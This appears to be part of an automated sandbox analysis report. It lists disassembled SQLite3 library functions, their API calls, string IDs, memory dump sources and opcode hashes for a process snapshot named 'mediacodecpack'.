                                                                                        • sqlite3_reset.SQLITE3 ref: 609679E9
                                                                                          • Part of subcall function 609160CD: sqlite3_realloc.SQLITE3 ref: 609160EF
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 60967587
                                                                                          • Part of subcall function 6091D5DC: sqlite3_value_bytes.SQLITE3 ref: 6091D5F4
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 60967572
                                                                                          • Part of subcall function 6091D57E: sqlite3_value_blob.SQLITE3 ref: 6091D596
                                                                                        • sqlite3_reset.SQLITE3 ref: 609675B7
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 60967641
                                                                                        • sqlite3_step.SQLITE3 ref: 6096764C
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 6096766E
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096768B
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 6096754F
                                                                                          • Part of subcall function 609256E5: sqlite3_bind_int64.SQLITE3 ref: 60925704
                                                                                        • sqlite3_bind_int.SQLITE3 ref: 609690B2
                                                                                        • sqlite3_bind_blob.SQLITE3 ref: 609690DB
                                                                                        • sqlite3_step.SQLITE3 ref: 609690E6
                                                                                        • sqlite3_reset.SQLITE3 ref: 609690F1
                                                                                        • sqlite3_free.SQLITE3 ref: 60969102
                                                                                        • sqlite3_free.SQLITE3 ref: 6096910D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_reset$sqlite3_step$sqlite3_column_int64sqlite3_free$sqlite3_bind_int64$sqlite3_bind_int$sqlite3_column_blobsqlite3_column_bytessqlite3_mallocsqlite3_mprintf$sqlite3_column_intsqlite3_mutex_leave$memcmpsqlite3_bind_blobsqlite3_bind_valuesqlite3_blob_bytessqlite3_blob_readsqlite3_blob_reopensqlite3_initializesqlite3_mutex_entersqlite3_prepare_v2sqlite3_reallocsqlite3_value_blobsqlite3_value_bytes
                                                                                        • String ID: $d
                                                                                        • API String ID: 2451604321-2084297493
                                                                                        • Opcode ID: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                        • Instruction ID: 6b7ea73e19bc996eb6a422b8fcf26663d3cb25e4dd91ceba81a4d6a678ae72ab
                                                                                        • Opcode Fuzzy Hash: 8a4e51d2763d1baa8146902d495da2ef892242416c9706ebfa3093aedc646825
                                                                                        • Instruction Fuzzy Hash: 2CF2CF74A152288FDB54CF68C980B9EBBF2BF69304F1185A9E888A7341D774ED85CF41
                                                                                        APIs
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6096A64C
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6096A656
                                                                                        • sqlite3_strnicmp.SQLITE3 ref: 6096A682
                                                                                        • sqlite3_strnicmp.SQLITE3 ref: 6096A6BC
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 6096A6F9
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6096A754
                                                                                        • sqlite3_step.SQLITE3 ref: 6096A969
                                                                                        • sqlite3_free.SQLITE3 ref: 6096A9AC
                                                                                        • sqlite3_finalize.SQLITE3 ref: 6096A9BB
                                                                                        • sqlite3_strnicmp.SQLITE3 ref: 6096B04A
                                                                                          • Part of subcall function 6096A38C: sqlite3_bind_int.SQLITE3 ref: 6096A3DE
                                                                                          • Part of subcall function 6096A38C: sqlite3_step.SQLITE3 ref: 6096A435
                                                                                          • Part of subcall function 6096A38C: sqlite3_reset.SQLITE3 ref: 6096A445
                                                                                        • sqlite3_value_int.SQLITE3 ref: 6096B241
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6096B270
                                                                                        • sqlite3_bind_null.SQLITE3 ref: 6096B2DF
                                                                                        • sqlite3_step.SQLITE3 ref: 6096B2EA
                                                                                        • sqlite3_reset.SQLITE3 ref: 6096B2F5
                                                                                        • sqlite3_value_int.SQLITE3 ref: 6096B43B
                                                                                        • sqlite3_value_text.SQLITE3 ref: 6096B530
                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6096B576
                                                                                        • sqlite3_free.SQLITE3 ref: 6096B5F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stepsqlite3_strnicmp$sqlite3_freesqlite3_mallocsqlite3_resetsqlite3_value_bytessqlite3_value_intsqlite3_value_text$sqlite3_bind_intsqlite3_bind_nullsqlite3_finalizesqlite3_mprintf
                                                                                        • String ID: optimize
                                                                                        • API String ID: 1540667495-3797040228
                                                                                        • Opcode ID: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                        • Instruction ID: 15d53f9c7948a495e2c6926a79545eea34293df74e7a3e63ea56b3727437b729
                                                                                        • Opcode Fuzzy Hash: ab382b16e3f59fac809a38361d516dac1e6c4c02a096abfb60effccae4f38c9b
                                                                                        • Instruction Fuzzy Hash: 54B2F670A142198FEB14DF68C890B9DBBF6BF68304F1085A9E889AB351E774DD85CF41
                                                                                        APIs
                                                                                        • sqlite3_finalize.SQLITE3 ref: 60966178
                                                                                        • sqlite3_free.SQLITE3 ref: 60966183
                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609661AE
                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609661DE
                                                                                        • sqlite3_value_text.SQLITE3 ref: 60966236
                                                                                        • sqlite3_value_int.SQLITE3 ref: 60966274
                                                                                        • memcmp.MSVCRT ref: 6096639E
                                                                                          • Part of subcall function 60940A5B: sqlite3_malloc.SQLITE3 ref: 60940AA1
                                                                                          • Part of subcall function 60940A5B: sqlite3_free.SQLITE3 ref: 60940C1D
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60966B51
                                                                                        • sqlite3_mprintf.SQLITE3 ref: 60966B7D
                                                                                          • Part of subcall function 609296AA: sqlite3_initialize.SQLITE3 ref: 609296B0
                                                                                          • Part of subcall function 609296AA: sqlite3_vmprintf.SQLITE3 ref: 609296CA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_freesqlite3_mprintfsqlite3_value_numeric_type$memcmpsqlite3_finalizesqlite3_initializesqlite3_mallocsqlite3_value_intsqlite3_value_textsqlite3_vmprintf
                                                                                        • String ID: ASC$DESC$x
                                                                                        • API String ID: 4082667235-1162196452
                                                                                        • Opcode ID: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                        • Instruction ID: 01f4316cc9c65235d83944c747b96ccca9397e1276bdc6c450b31a73d7ca280a
                                                                                        • Opcode Fuzzy Hash: 7264e4280a4ba67b830c3238f8418230a53be4a89f04bb086879d88682624c0f
                                                                                        • Instruction Fuzzy Hash: AD921274A14319CFEB10CFA9C99079DBBB6BF69304F20816AD858AB342D774E985CF41
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 609693A5
                                                                                        • sqlite3_step.SQLITE3(?,?), ref: 609693B0
                                                                                        • sqlite3_column_int64.SQLITE3(?,?), ref: 609693DC
                                                                                          • Part of subcall function 6096A2BD: sqlite3_bind_int64.SQLITE3 ref: 6096A322
                                                                                          • Part of subcall function 6096A2BD: sqlite3_step.SQLITE3 ref: 6096A32D
                                                                                          • Part of subcall function 6096A2BD: sqlite3_column_int.SQLITE3 ref: 6096A347
                                                                                          • Part of subcall function 6096A2BD: sqlite3_reset.SQLITE3 ref: 6096A354
                                                                                        • sqlite3_reset.SQLITE3(?,?), ref: 609693F3
                                                                                        • sqlite3_malloc.SQLITE3(?), ref: 60969561
                                                                                        • sqlite3_malloc.SQLITE3(?), ref: 6096958D
                                                                                        • sqlite3_step.SQLITE3(?), ref: 609695D2
                                                                                        • sqlite3_column_int64.SQLITE3(?), ref: 609695EA
                                                                                        • sqlite3_reset.SQLITE3(?), ref: 60969604
                                                                                        • sqlite3_realloc.SQLITE3(?), ref: 609697D0
                                                                                        • sqlite3_realloc.SQLITE3(?), ref: 609698A9
                                                                                          • Part of subcall function 609129D5: sqlite3_initialize.SQLITE3(?,?,?,60915F55,?,?,?,?,?,?,00000000,?,?,?,60915FE2,00000000), ref: 609129E0
                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 609699B8
                                                                                        • sqlite3_bind_int64.SQLITE3(?), ref: 6096934D
                                                                                          • Part of subcall function 60925686: sqlite3_mutex_leave.SQLITE3 ref: 609256D3
                                                                                        • sqlite3_bind_int64.SQLITE3(?,?), ref: 60969A6A
                                                                                        • sqlite3_step.SQLITE3(?,?), ref: 60969A75
                                                                                        • sqlite3_reset.SQLITE3(?,?), ref: 60969A80
                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D41
                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D4C
                                                                                        • sqlite3_free.SQLITE3(?), ref: 60969D5B
                                                                                          • Part of subcall function 6095ECA6: sqlite3_mprintf.SQLITE3 ref: 6095ED06
                                                                                          • Part of subcall function 6095ECA6: sqlite3_prepare_v2.SQLITE3 ref: 6095ED8D
                                                                                          • Part of subcall function 6095ECA6: sqlite3_free.SQLITE3 ref: 6095ED9B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64$sqlite3_freesqlite3_resetsqlite3_step$sqlite3_column_int64sqlite3_mallocsqlite3_realloc$sqlite3_column_intsqlite3_initializesqlite3_mprintfsqlite3_mutex_leavesqlite3_prepare_v2
                                                                                        • String ID:
                                                                                        • API String ID: 961572588-0
                                                                                        • Opcode ID: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                        • Instruction ID: dba6eef834311e7f80380fc62c490a647dd1765b4da9a7e0a506f520bf28697a
                                                                                        • Opcode Fuzzy Hash: c724daf3936d67fd3e7a59374d144345718a9f8d9c21f3c7abba70c9fa35c0f4
                                                                                        • Instruction Fuzzy Hash: 9872F275A042298FDB24CF69C88078DB7F6FF98314F1586A9D889AB341D774AD81CF81
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_mutex_leavesqlite3_stricmp
                                                                                        • String ID: 2$foreign key$indexed
                                                                                        • API String ID: 4126863092-702264400
                                                                                        • Opcode ID: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                        • Instruction ID: 3d5d194cd292e354de8359ea213fef7e5121ae3f60f7d2d7ba557b44893e8b9c
                                                                                        • Opcode Fuzzy Hash: efb0247afb620838301bdf32ec29a55ffab8ab84c5461d6934eb6e15b590f11f
                                                                                        • Instruction Fuzzy Hash: 6BE1B374A142099FDB04CFA8D590A9DBBF2BFA9304F21C129E855AB754DB35ED82CF40
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094A72B
                                                                                        • sqlite3_step.SQLITE3 ref: 6094A73C
                                                                                        • sqlite3_column_blob.SQLITE3 ref: 6094A760
                                                                                        • sqlite3_column_bytes.SQLITE3 ref: 6094A77C
                                                                                        • sqlite3_malloc.SQLITE3 ref: 6094A793
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094A7F2
                                                                                        • sqlite3_free.SQLITE3(?), ref: 6094A87C
                                                                                          • Part of subcall function 60901C61: sqlite3_mutex_enter.SQLITE3 ref: 60901C80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_column_blobsqlite3_column_bytessqlite3_freesqlite3_mallocsqlite3_mutex_entersqlite3_resetsqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 2794791986-0
                                                                                        • Opcode ID: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                        • Instruction ID: 088d5e00ded46b3eb5457b54e5d33bc48436a4b712d77f6ae5dc1ca3eb859b7b
                                                                                        • Opcode Fuzzy Hash: 324244e72ed1eb068e97444324dd06558e7f5640642cd65f7376e38a8826fd77
                                                                                        • Instruction Fuzzy Hash: BE5110B5A042058FCB04CF69C48069ABBF6FF68318F158569E858AB345D734EC82CF90
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stricmp
                                                                                        • String ID: USING COVERING INDEX $DISTINCT$ORDER BY
                                                                                        • API String ID: 912767213-1308749736
                                                                                        • Opcode ID: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                        • Instruction ID: 4f43644a9add5c5df618cbd47cd61ce2203d262f2077f605e752fe25420d36ab
                                                                                        • Opcode Fuzzy Hash: 5e6ae8a77223c4cf3853263767bd84c2ef0a0cb2633a4755bdfaa367f33b2fd5
                                                                                        • Instruction Fuzzy Hash: 2412D674A08268CFDB25DF28C880B5AB7B3AFA9314F1085E9E8899B355D774DD81CF41
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B488
                                                                                        • sqlite3_step.SQLITE3 ref: 6094B496
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B4A4
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B4D2
                                                                                        • sqlite3_step.SQLITE3 ref: 6094B4E0
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B4EE
                                                                                          • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_bind_int64sqlite3_resetsqlite3_step$memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4082478743-0
                                                                                        • Opcode ID: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                                        • Instruction ID: 9e7f29540a3c6f2d28ce6b101cd1a975f5529a8f599b89b7128c34d749e8d9ce
                                                                                        • Opcode Fuzzy Hash: 967f7dd55d0e0ed5657609aa573e07de9c17706341fbe9ef37ba536950e7892f
                                                                                        • Instruction Fuzzy Hash: DD41D2B4A087018FCB50DF69C484A9EB7F6EFA8364F158929EC99CB315E734E8418F51
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6094D354
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6094D546
                                                                                          • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905D8B
                                                                                          • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DA4
                                                                                          • Part of subcall function 60905D76: sqlite3_stricmp.SQLITE3 ref: 60905DB8
                                                                                        • sqlite3_stricmp.SQLITE3 ref: 6094D3DA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: sqlite3_stricmp$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                        • String ID: BINARY$INTEGER
                                                                                        • API String ID: 317512412-1676293250
                                                                                        • Opcode ID: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                        • Instruction ID: cace79839434994537c0410bddb438ad3d501bddbf1b20fcc6a8a8bdb5da7fdd
                                                                                        • Opcode Fuzzy Hash: a7efc97792d1e6a4bc5cda92ab6d03f9066f32250883ff14ac0274f07e3e06bf
                                                                                        • Instruction Fuzzy Hash: 8E712978A056099BDB05CF69C49079EBBF2BFA8308F11C529EC55AB3A4D734E941CF80
                                                                                        APIs
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094B582
                                                                                        • sqlite3_step.SQLITE3 ref: 6094B590
                                                                                        • sqlite3_column_int64.SQLITE3 ref: 6094B5AD
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094B5EE
                                                                                        • memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: memmovesqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_step
                                                                                        • String ID:
                                                                                        • API String ID: 2802900177-0
                                                                                        • Opcode ID: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                        • Instruction ID: fa681a173a9aa7ad5377a8f3376375fc0286f70c891b696e42c92f52458a3a0e
                                                                                        • Opcode Fuzzy Hash: f7dd783d858009ac2aa36dfb06bc3a4e86bc75c1920f7d1bf53ec4d0fe99899e
                                                                                        • Instruction Fuzzy Hash: 0B517D75A082018FCB14CF69C48169EF7F7FBA8314F25C669D8499B318EA74EC81CB81
                                                                                        APIs
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6093F443
                                                                                          • Part of subcall function 60904396: sqlite3_mutex_try.SQLITE3(?,?,?,60908235), ref: 609043B8
                                                                                        • sqlite3_mutex_enter.SQLITE3 ref: 6093F45C
                                                                                          • Part of subcall function 60939559: memcmp.MSVCRT ref: 60939694
                                                                                          • Part of subcall function 60939559: memcmp.MSVCRT ref: 609396CA
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6093F8CD
                                                                                        • sqlite3_mutex_leave.SQLITE3 ref: 6093F8E3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558110033.000000006097B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558128487.000000006097D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558148690.0000000060980000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_2_2_60900000_mediacodecpack.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcmpsqlite3_mutex_entersqlite3_mutex_leave$sqlite3_mutex_try
                                                                                        • String ID:
                                                                                        • API String ID: 4038589952-0
                                                                                        • Opcode ID: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                        • Instruction ID: 916146ddc5613ce70bfe97dc7fabc38680eb49f4f4fdba01105907ea2da9c682
                                                                                        • Opcode Fuzzy Hash: 29e5932b9866e1e5e2fcd92ac707fe98724786dada8c9b11deae4621e05e1fb7
                                                                                        • Instruction Fuzzy Hash: 87F13674A046158FDB18CFA9C590A9EB7F7AFA8308F248429E846AB355D774EC42CF40
                                                                                        APIs
                                                                                          • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
                                                                                          • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
                                                                                          • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
                                                                                          • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
                                                                                        • sqlite3_bind_int64.SQLITE3 ref: 6094C719
                                                                                        • sqlite3_step.SQLITE3 ref: 6094C72A
                                                                                        • sqlite3_reset.SQLITE3 ref: 6094C73B
                                                                                          • Part of subcall function 6094B54C: memmove.MSVCRT(?,?,?,?,?,?,?,?,00000000,?,6094B44B), ref: 6094B6B5
                                                                                          • Part of subcall function 6094A9F5: sqlite3_free.SQLITE3(?,?,?,00000000,?,?,6094AC3F), ref: 6094AA7A
                                                                                        • sqlite3_free.SQLITE3 ref: 6094C881
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.3557951826.0000000060901000.00000020.00000001.01000000.0000000A.sdmp, Offset: 60900000, based on PE: true
                                                                                        • Associated: 00000002.00000002.3557936161.0000000060900000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558063665.000000006096E000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000002.00000002.3558081558.000000006096F000.00000002.00000001.01000000.0000000A.sdmpDownload File
